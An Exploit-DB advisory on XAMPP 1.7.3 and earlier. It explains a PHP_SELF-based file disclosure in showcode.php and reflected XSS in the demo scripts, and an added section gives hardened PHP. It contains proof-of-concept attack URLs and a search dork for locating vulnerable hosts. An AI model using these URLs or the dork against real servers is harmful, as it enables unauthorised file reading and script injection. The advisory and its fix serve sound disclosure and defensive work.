exploit-db-mirror/platforms/php/webapps/15370.txt
Offensive Security 7ef2cb97bd DB: 2017-01-07

# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilities
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
I. File disclosure
XAMPP is vulnerable to a remote file disclosure attack.
The flaw is in the demo web application shipped with XAMPP (the xampp directory under htdocs):
http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
showcode.php:
<?php
echo '<br><br>';
if ($_REQUEST['showcode'] != 1) {
    // $TEXT holds XAMPP's interface strings
    echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
} else {
    // PHP_SELF includes any path info appended to the URL, so the name opened here is attacker-controlled
    $file = file_get_contents(basename($_SERVER['PHP_SELF']));
    echo "<h2>".$TEXT['global-sourcecode']."</h2>";
    echo "<textarea cols='100' rows='10'>";
    echo htmlspecialchars($file);
    echo "</textarea>";
}
?>
showcode.php relies on basename($_SERVER['PHP_SELF']) to decide which file to read.
$_SERVER['PHP_SELF'] is the path of the requested script, but it also carries any extra path appended after the script name, so for the request above it is "/xampp/showcode.php/c:boot.ini".
basename() returns the last element of that path, using "/" as the delimiter (on Windows PHP's basename() treats "\" as a separator too), which here is "c:boot.ini", and file_get_contents() opens it.
Walking up or down the directory tree would require a separator inside the final element, and basename() discards everything up to the last separator.
Directory traversal is therefore not possible, but the final element can still be a drive-relative name such as c:boot.ini, so files can be read from any drive as well as from the directory showcode.php runs from (htdocs/xampp).
On Windows a name like c:boot.ini resolves against the server process's current directory on that drive, so whether a given file is reachable depends on where the service was started; the PoC above assumes boot.ini is found that way.
II. Cross Site Scripting
http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
The same programming error leads to a second vulnerability.
Some PHP scripts in the xampp directory use $_SERVER['PHP_SELF'] to fill the "action" attribute of their HTML forms, and echo it without escaping.
Because PHP_SELF includes whatever path is appended to the URL, an attacker can close the attribute and inject markup, i.e. reflected Cross Site Scripting.
biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
Note that basename() keeps only the text after the last "/", so only the final path segment reaches the attribute; a payload that itself contains a "/" (such as the closing </script> tag in the URLs above) is cut at that slash.
dork: "inurl:xampp/biorhythm.php"
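Hardened counterparts of the two $_SERVER['PHP_SELF'] uses from sections I and II, as an added example (this is not XAMPP's code). It assumes PHP 7.1 or later, that the file is saved as showcode_fixed.php inside the directory holding the demo scripts, and that ALLOWED_SOURCES (a name chosen here) is the complete list of files the page may display; the $_SERVER values in demo() are constructed the way Apache/mod_php would set them for the advisory's two request URLs.

```php
<?php
// Added example, not XAMPP's code. Assumptions: PHP 7.1+, saved as
// showcode_fixed.php next to the demo scripts, ALLOWED_SOURCES chosen here.

const ALLOWED_SOURCES = ['showcode_fixed.php', 'biorhythm.php', 'phonebook.php'];

// Section I. PHP_SELF is SCRIPT_NAME plus any trailing path info, so for
// /xampp/showcode.php/c:boot.ini basename(PHP_SELF) is "c:boot.ini".
// __FILE__ is the path of the script PHP actually executed; the request
// cannot change it, so "show my own source" needs nothing from $_SERVER.
function ownSource(): string
{
    return file_get_contents(__FILE__);
}

// If the caller may choose which demo script to show, take the name from
// the query string but accept it only when it matches an allowlist entry
// exactly, then open it from this script's own directory. Drive letters,
// separators and traversal sequences never match and are rejected.
function sourceOf(string $name): ?string
{
    if (!in_array($name, ALLOWED_SOURCES, true)) {
        return null;
    }
    return file_get_contents(__DIR__ . DIRECTORY_SEPARATOR . $name);
}

// Section II. SCRIPT_NAME does not carry the path-info suffix, and escaping
// it makes quotes and angle brackets inert inside the attribute regardless.
function formAction(): string
{
    return htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
}

// Side-by-side output for the advisory's two request URLs. The $_SERVER
// entries are constructed here the way Apache/mod_php would set them.
function demo(): void
{
    $_SERVER['SCRIPT_NAME'] = '/xampp/showcode.php';
    $_SERVER['PHP_SELF']    = '/xampp/showcode.php/c:boot.ini';
    echo 'vulnerable : opens ', basename($_SERVER['PHP_SELF']), "\n";      // c:boot.ini
    echo 'hardened   : opens ', basename(__FILE__), "\n";                  // this script only
    echo 'allowlist  : ', var_export(sourceOf('c:boot.ini'), true), "\n";  // NULL, rejected

    $_SERVER['SCRIPT_NAME'] = '/xampp/biorhythm.php';
    $_SERVER['PHP_SELF']    = '/xampp/biorhythm.php/"><script>alert("XSS")</script>';
    echo 'unescaped  : action="', $_SERVER['PHP_SELF'], "\"\n";            // breaks out of the attribute
    echo 'basename   : action="', basename($_SERVER['PHP_SELF']), "\"\n";  // last "/"-segment only: script>
    echo 'hardened   : action="', formAction(), "\"\n";                    // /xampp/biorhythm.php
}

demo();
```

Run it with `php showcode_fixed.php`; the point of the allowlist variant is that the user-supplied value is only ever compared against known names and never used to build a path, while the form fix both drops the path-info suffix (SCRIPT_NAME) and escapes the result, so either measure alone would already defeat the URLs quoted above.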